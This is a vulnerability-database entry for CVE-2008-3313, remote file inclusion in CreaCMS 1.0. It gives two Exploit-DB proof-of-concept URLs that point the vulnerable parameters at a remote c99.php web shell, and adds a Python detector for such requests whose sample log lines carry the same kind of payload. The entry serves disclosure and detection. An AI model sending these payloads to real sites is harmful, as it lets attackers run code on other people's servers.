CVE-2008-3313
Published: 2008-07-25
Priority: P3 (42) | Severity: high | CVSS 2.0: 7.5
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.25% (80.7th percentile)
Multiple PHP remote file inclusion vulnerabilities in CreaCMS 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the (1) cfg[document_uri] parameter to _administration/edition_article/edition_article.php and the (2) cfg[base_uri_admin] parameter to _administration/fonctions/get_liste_langue.php. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| creacms | creacms | — | — |
No detection rules found.
Exploit-DB
CreaCMS - '/fonctions/get_liste_langue.php?cfg[base_uri_admin]' Remote File Inclusion
exploitdb·2008-07-18
---
source: https://www.securityfocus.com/bid/30284/info
CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
CreaCMS 1 is vulnerable; other versions may also be affected.
http://www.example.com/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://127.0.0.1/c99.php?
Exploit-DB
CreaCMS - '/edition_article/edition_article.php?cfg[document_uri]' Remote File Inclusion
exploitdb·2008-07-18
---
source: https://www.securityfocus.com/bid/30284/info
CreaCMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
CreaCMS 1 is vulnerable; other versions may also be affected.
http://www.example.com/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=http://127.0.0.1/c99.php?
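Detection logic for the two requests described above, as an added example that is not part of the CVE record or the Exploit-DB entries: it flags access-log lines in which either named parameter carries a URL-like value, including percent-encoded variants. The combined log format, the sample lines and the host `host.example` are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Script path -> parameter, both taken from the CVE-2008-3313 description.
WATCHED = {
    "_administration/edition_article/edition_article.php": "cfg[document_uri]",
    "_administration/fonctions/get_liste_langue.php": "cfg[base_uri_admin]",
}
# Values that point include() at a remote or stream resource: scheme://, //host, data:
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*://|//|data:)", re.I)
# Request target inside a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def flag_rfi(line):
    """Return (script, parameter, value) for a matching request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    raw_path, _, query = m.group(1).partition("?")
    path = unquote(raw_path).lower()
    for script, param in WATCHED.items():
        if ("/" + script) not in path:
            continue
        # parse_qsl percent-decodes names and values, so cfg%5B...%5D is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == param and REMOTE.match(value):
                return (script, param, value)
    return None


def scan(lines):
    """Return (line_number, hit) pairs for every flagged line."""
    return [(n, hit) for n, line in enumerate(lines, 1) if (hit := flag_rfi(line))]


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jul/2008:10:00:01 +0000] "GET /creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://host.example/x.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [18/Jul/2008:10:00:05 +0000] "GET /creacms/_administration/edition_article/edition_article.php?cfg%5Bdocument_uri%5D=hTTp%3A%2F%2Fhost.example%2Fx.txt%3F HTTP/1.1" 200 733',
    '192.0.2.12 - - [18/Jul/2008:10:00:09 +0000] "GET /creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=/articles/intro.html HTTP/1.1" 200 901',
    '192.0.2.13 - - [18/Jul/2008:10:00:12 +0000] "GET /creacms/index.php?page=http://host.example/ HTTP/1.1" 200 1204',
]

if __name__ == "__main__":
    for n, (script, param, value) in scan(SAMPLE_LOG):
        print(f"line {n}: {param} -> {value!r} on {script}")
```

The third sample line shows the same parameter with a local path, which is not flagged; only values that begin with a scheme, `//` or `data:` are reported.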
No writeups or analysis indexed.
2008-07-25
Published